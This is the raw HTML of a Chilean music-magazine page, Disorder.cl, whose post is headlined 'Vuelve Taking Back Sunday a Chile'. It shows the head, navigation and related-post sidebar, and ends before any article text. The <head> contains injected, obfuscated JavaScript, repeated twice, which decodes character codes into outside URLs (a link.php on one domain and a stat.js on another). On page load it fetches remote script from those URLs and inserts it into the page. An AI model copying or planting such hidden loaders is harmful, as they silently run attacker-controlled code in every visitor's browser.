    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head><script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>

        
        
        Vuelve Taking Back Sunday a Chile y no damos más de felicidad - Disorder.cl Magazine &raquo; Disorder.cl Magazine
        
        
        
        
        
</title>



    <meta property="og:title" content="Vuelve Taking Back Sunday a Chile y no damos más de felicidad" />

    <meta property="og:type" content="website" />

    <meta property="og:url" content="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/" />

    <meta property="og:site_name" content="Disorder Magazine" />

    <meta property="og:description" content="OMG! OMG! Vuelve Taking Back Sunday a Chile y con ellos renace nuestro inquebrantable emo interior. Entérate de los detalles tras el salto y empieza a delinearte los ojos nuevamente, porque se viene chiquilles" />

    <meta property="fb:app_id" content="398484361807"/>

<meta name="generator" content="WordPress 4.9.8" />

<link rel="stylesheet" href="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/style.css" type="text/css" media="screen" />

<link rel="alternate" type="application/rss+xml" title="Disorder.cl Magazine RSS Feed" href="http://www.disorder.cl/feed/" />

<link rel="pingback" href="http://www.disorder.cl/blog/xmlrpc.php" />

<link rel="shortcut icon" href="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/favicon.png"/>

<meta name="google-site-verification" content="SN4VZSy8bJfSYW4828PxvbtFj3gAlSvRTmceRJparqE" />



<link href='http://fonts.googleapis.com/css?family=Ropa+Sans:400,400italic' rel='stylesheet' type='text/css'>


<link href='http://fonts.googleapis.com/css?family=Open+Sans:400,600,300,800,700' rel='stylesheet' type='text/css'>



<!-- This site is optimized with the Yoast WordPress SEO plugin v1.7.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/" />
<!-- / Yoast WordPress SEO plugin. -->

<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Disorder.cl Magazine &raquo; Vuelve Taking Back Sunday a Chile y no damos más de felicidad RSS de los comentarios" href="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.disorder.cl\/blog\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='recent-comments-with-gravatar-css'  href='http://www.disorder.cl/blog/wp-content/plugins/recent-comments-with-gravatar/style.css?ver=1.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://www.disorder.cl/blog/wp-content/plugins/wp-polls/polls-css.css?ver=2.63' type='text/css' media='all' />
<script type='text/javascript' src='http://www.disorder.cl/blog/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.disorder.cl/blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://www.disorder.cl/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.disorder.cl/blog/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.disorder.cl/blog/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='http://www.disorder.cl/?p=69987' />
<link rel="alternate" type="application/json+oembed" href="http://www.disorder.cl/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.disorder.cl%2F2018%2F10%2F11%2Fvuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.disorder.cl/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.disorder.cl%2F2018%2F10%2F11%2Fvuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad%2F&#038;format=xml" />
<script type="text/javascript" src="http://www.disorder.cl/blog/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6"></script>
<script type="text/javascript">AudioPlayer.setup("http://www.disorder.cl/blog/wp-content/plugins/audio-player/assets/player.swf?ver=2.0.4.6", {width:"630",animation:"yes",encode:"yes",initialvolume:"100",remaining:"no",noinfo:"no",buffer:"5",checkpolicy:"no",rtl:"no",bg:"f8f8f8",text:"666666",leftbg:"eeeeee",lefticon:"666666",volslider:"666666",voltrack:"FFFFFF",rightbg:"cccccc",rightbghover:"999999",righticon:"666666",righticonhover:"ffffff",track:"FFFFFF",loader:"9FFFB8",border:"666666",tracker:"DDDDDD",skip:"666666",pagebg:"FFFFFF",transparentpagebg:"yes"});</script>
<script type="text/javascript" src="http://www.disorder.cl/blog/wp-content/plugins/cforms/js/cforms.js"></script>
<style type="text/css">
.wp-polls .pollbar {
	margin: 1px;
	font-size: 13px;
	line-height: 15px;
	height: 15px;
	background: #0e92aa;
	border: 1px solid #106b7c;
}
</style>


<!-- Facebook Like Thumbnail (v0.4) -->
<meta property="og:image" content="http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs-portada.jpg" />
<!-- using featured thumbnail -->
<!-- Facebook Like Thumbnail (By Ashfame - https://github.com/ashfame/facebook-like-thumbnail) -->

<!-- Vipers Video Quicktags v6.5.2 | http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/ -->
<style type="text/css">
.vvqbox { display: block; max-width: 100%; visibility: visible !important; margin: 10px auto; } .vvqbox img { max-width: 100%; height: 100%; } .vvqbox object { max-width: 100%; } 
</style>
<script type="text/javascript">
// <![CDATA[
	var vvqflashvars = {};
	var vvqparams = { wmode: "opaque", allowfullscreen: "true", allowscriptaccess: "always" };
	var vvqattributes = {};
	var vvqexpressinstall = "http://www.disorder.cl/blog/wp-content/plugins/vipers-video-quicktags/resources/expressinstall.swf";
// ]]>
</script>

<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>



<script type='text/javascript'>

  (function() {

    var useSSL = 'https:' == document.location.protocol;

    var src = (useSSL ? 'https:' : 'http:') +

        '//www.googletagservices.com/tag/js/gpt.js';

    document.write('<scr' + 'ipt src="' + src + '"></scr' + 'ipt>');

  })();

</script>



<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 52, 56, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));</script><script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104,116,116,112,115,58,47,47,119,119,119,46,108,101,97,114,110,105,110,103,116,111,111,108,107,105,116,46,99,108,117,98,47,108,105,110,107,46,112,104,112);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script></head>



<body id="contenido" >



<script src='https://www.googletagservices.com/tag/js/gpt.js'>
  googletag.pubads().defineOutOfPagePassback('/92947493/ITT_DISORDER_ALL')
                    .display();
</script>



<!-- HM -->



<!-- END -->



<div id="fb-root"></div>



<script>(function(d, s, id) {

    var js, fjs = d.getElementsByTagName(s)[0];

    if (d.getElementById(id)) {return;}

    js = d.createElement(s); js.id = id;

    js.src = "//connect.facebook.net/es_ES/all.js#xfbml=1";

    fjs.parentNode.insertBefore(js, fjs);

    }(document, 'script', 'facebook-jssdk'));

</script>



<script type="text/javascript">

    var _gaq = _gaq || [];

    _gaq.push(['_setAccount', 'UA-794789-1']);

    _gaq.push(['_trackPageview']);

    (function() {

    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;

    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);

    })();

</script>



<div class="mask">

    <div class="searchbox">

        <h1>Busca en Disorder</h1>

        <form action="http://www.disorder.cl/" id="search" method="get">

            <input type="text" name="s" id="s" value="" class="search-input" />

            <input type="submit" value="BUSCAR" class="submit">

        </form>

        <a class="close" href="#">Cerrar</a>

    </div>

</div>



<div class="head">



<!--TAG MEDIATRENDS - NO QUITAR-->



<!--FIN TAG MEDIATRENDS - NO QUITAR-->



    <div class="header">

    
        <div class="logo">

        <a href="http://www.disorder.cl" rel="bookmark" ><img src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/img/logo-head.png" /></a>

        </div>

        <div class="banner1" style="margin:inherit !important;padding-top:5px;">



            <script src='https://www.googletagservices.com/tag/js/gpt.js'>
  googletag.pubads().defineOutOfPagePassback('/92947493/ITT_DISORDER_ALL')
                    .display();
</script>
        </div>

    </div>

</div>






<div id="menubar">

    <div class="menu">

        <a href="http://www.disorder.cl" >PORTADA</a>

        <a href="http://www.disorder.cl/magazine" > MAGAZINE </a>

        
        <a href="http://www.disorder.cl/musica"  class="active" > M&Uacute;SICA </a>

        <a href="http://www.disorder.cl/cine-y-tv" > CINE Y TV </a>

        <a href="http://www.disorder.cl/tecnologia-e-internet"> Tecnolog&iacute;a e Internet </a>

        <a href="http://www.disorder.cl/videos"  > VIDEOS </a>

        <a href="http://www.disorder.cl/contacto" > CONTACTO </a>

        <a href="http://www.facebook.com/disordernews" class="fb"> /disordernews </a>

        <a href="http://www.twitter.com/disordernews" class="tw"> @disordernews </a>

        <img src="http://www.disorder.cl/blog/wp-content/themes/Disorder-2014/img/zoom2.png" class="opensearch" width="25" height="25" />

    </div>

</div>

    
    
    <div class="single-title" style="background-image:url(http://www.disorder.cl/blog/wp-content/uploads/2018/10/tbs-front.jpg)">
        <div class="single-title-data">
            <ul class="post-categories">
	<li><a href="http://www.disorder.cl/musica/" rel="category tag">Musica</a></li></ul>            <h1>Vuelve Taking Back Sunday a Chile y no damos más de felicidad</h1>
            <div class="post-metadata">
            
                                
            </div>
        </div>

        

    </div>

    <div class="author-rss" id="social">
        <div class="single-author">
            
            <img alt='' src='http://2.gravatar.com/avatar/821b39db1780eb6c0541db54da7b29fb?s=90&#038;d=retro&#038;r=g' srcset='http://2.gravatar.com/avatar/821b39db1780eb6c0541db54da7b29fb?s=180&#038;d=retro&#038;r=g 2x' class='avatar avatar-90 photo' height='90' width='90' />            <h2>Publicado por disorder.cl</h2>
                        <p>Archivo: <a href="http://www.disorder.cl/author/disordercl/">1706 artículos</a></p>
        </div>
        <div class="rrss">
                        <div id="fb-root" style="float:left; margin:0px 0px 20px 0px;"></div><script src="http://connect.facebook.net/es_ES/all.js#xfbml=1"></script><fb:like href="http://www.disorder.cl/2018/10/11/vuelve-taking-back-sunday-chile-y-no-damos-mas-de-felicidad/" send="false" layout="button_count" width="115" height="25" show_faces="true" action="like" font=""></fb:like>
                        <a style="margin:20px 0px 0px 0px;" href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="disordernews" data-lang="es">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
                    </div>
    </div>

    <div class="wrap single">

        <div class="sidebar" id="fixed"> 
    
    	<div class="banner2">

<!--
<ins class='dcmads' style='display:inline-block;width:300px;height:250px'
    data-dcm-placement='N97601.279390DISORDER/B11040228.146979210'
    data-dcm-rendering-mode='iframe'
    data-dcm-https-only
    data-dcm-resettable-device-id=''
    data-dcm-app-id=''>
  <script src='https://www.googletagservices.com/dcm/dcmads.js'></script>
</ins>
-->




</div>
    
    <div class="clear"></div>

        <div class="side-title">
            MAGAZINE
            <a href="http://www.disorder.cl/magazine" title="Ver archivo de música" class="side-cat-link">Ver archivo</a>
        </div>
        <div class="clear"></div>
                    <div class="post-side">
                
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/08/tangerine-front-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="http://www.disorder.cl/blog/wp-content/uploads/2018/08/tangerine-front-300x200.jpg 300w, http://www.disorder.cl/blog/wp-content/uploads/2018/08/tangerine-front-285x190.jpg 285w, http://www.disorder.cl/blog/wp-content/uploads/2018/08/tangerine-front.jpg 900w" sizes="(max-width: 300px) 100vw, 300px" />
                <h1>
                    <a href="http://www.disorder.cl/2018/08/21/escucha-tangerine-reef-animal-collective/" title="Escucha "Tangerine Reef", el nuevo disco de Animal Collective a días de su show en Chile">
                        Escucha "Tangerine Reef", el nuevo disco de Animal Collective a días de su show en Chile                    </a>
                </h1>
                <small>11 de octubre de 2018</small>
            </div>
                    <div class="post-side">
                
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/07/jager-front1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="http://www.disorder.cl/blog/wp-content/uploads/2018/07/jager-front1-300x200.jpg 300w, http://www.disorder.cl/blog/wp-content/uploads/2018/07/jager-front1-285x190.jpg 285w, http://www.disorder.cl/blog/wp-content/uploads/2018/07/jager-front1.jpg 900w" sizes="(max-width: 300px) 100vw, 300px" />
                <h1>
                    <a href="http://www.disorder.cl/2018/07/26/el-primer-musik-platz-de-chile-cerro-con-mucho-jagermeister/" title="El primer Musik Platz de Chile cerró con mucho Jägermeister">
                        El primer Musik Platz de Chile cerró con mucho Jägermeister                    </a>
                </h1>
                <small>11 de octubre de 2018</small>
            </div>
                    <div class="post-side">
                
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/06/venezuela-1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />
                <h1>
                    <a href="http://www.disorder.cl/2018/06/26/chilena-viajo-venezuela-explica-el-panorama-pais-de-maduro/" title="Esta chilena viajó por Venezuela y nos explica el desolador panorama del país de Maduro">
                        Esta chilena viajó por Venezuela y nos explica el desolador panorama del país de Maduro                    </a>
                </h1>
                <small>11 de octubre de 2018</small>
            </div>
        
        <div class="side-title">
            M&Uacute;SICA
            <a href="http://www.disorder.cl/musica" title="Ver archivo de música" class="side-cat-link">Ver archivo</a>
        </div>
        <div class="clear"></div>
                    <div class="post-side">
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/NIÑOS-DEL-CERRO-LIMA-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                <h1>
                    <a href="http://www.disorder.cl/2018/10/09/cartel-festival-sideral/" title="Ya está el cartel completo del IV Festival Sideral">
                        Ya está el cartel completo del IV Festival Sideral                        
                    </a>
                </h1>
                <small>9 de octubre de 2018</small>
            </div>
                    <div class="post-side">
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" srcset="http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front-300x200.jpg 300w, http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front-285x190.jpg 285w, http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front-768x512.jpg 768w, http://www.disorder.cl/blog/wp-content/uploads/2018/10/barrio-front.jpg 900w" sizes="(max-width: 300px) 100vw, 300px" />                <h1>
                    <a href="http://www.disorder.cl/2018/10/09/barrio-mio-evento-rbmfstgo-barrio-yungay/" title="Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay">
                        Todo lo que hay que saber de Barrio Mío, el evento del RBMFSTGO en Barrio Yungay                        
                    </a>
                </h1>
                <small>9 de octubre de 2018</small>
            </div>
                    <div class="post-side">
                <img width="300" height="200" src="http://www.disorder.cl/blog/wp-content/uploads/2018/10/jamez1-300x200.jpg" class="attachment-300x200 size-300x200 wp-post-image" alt="" />                <h1>
                    <a href="http://www.disorder.cl/2018/10/06/jamez-manuel-venom-nuevo-tema/" title="Jamez Manuel se convierte en Venom en nuevo tema">
                        Jamez Manuel se convierte en Venom en nuevo tema                        
                    </a>
                </h1>
                <small>6 de octubre de 2018</small>
            </div>
        
        <div class="side-title">
            CINE Y TV
            <a href="http://www.disorder.cl/cine-y-tv" title="Ver archivo de música" class="side-cat-link">Ver archivo</a>
        </div>
        <div class="clear"></div>
                    <div class="post-side">
